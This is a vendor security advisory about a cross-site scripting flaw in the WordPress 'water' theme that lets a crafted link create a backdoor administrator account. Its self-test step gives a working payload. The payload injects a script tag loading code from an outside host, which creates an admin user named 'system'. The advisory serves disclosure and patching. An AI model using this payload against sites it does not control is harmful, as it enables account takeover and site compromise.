WordPress water theme allows attackers to gain administrative privileges

On August 6, 2021 BitFire released a cross-site scripting vulnerability for the WordPress water theme. At the time of this writing, there are several hundred websites currently using the theme. Several unchecked and un-escaped GET variables are added to a link tag in the page's head resulting in a Cross Site Scripting vulnerability. Possible full site compromise is possible if the site administrator clicks on a malicious link.

This flaw allows an attacker to craft a link to the target website that can result in a backdoor administrator account being created on the vulnerable site when clicked by the site administrator. The backdoor account could be used to upload malware to the target site and restrict access from the actual site administrator.

The theme developer could not be reached to create a patch for this issue. The following patch file is provided by BitFire. Download the patched header.php file with this link: header.php. Then replace the file wp-content/themes/water/header.php with this patched version.

Vulnerability confirmation

If your site is vulnerable, you can visit any post (not the homepage) on your site and append the following to that URL:

?preview=true&stylesheet="><script+src=https://bitfire.co/tools/wpadmin.php><&template=z

If your site is vulnerable, a new administrator user named system will be created with the password hacked. Be sure to remove this account after. If the patch is successful, or if your site is running a WordPess firewall, no user account will be created.

BitFire customers are already protected from this and hundreds of other vulnerabilities. Check out our guide to securing your WordPress or other PHP site for instructions on how you can prevent your site from being hacked.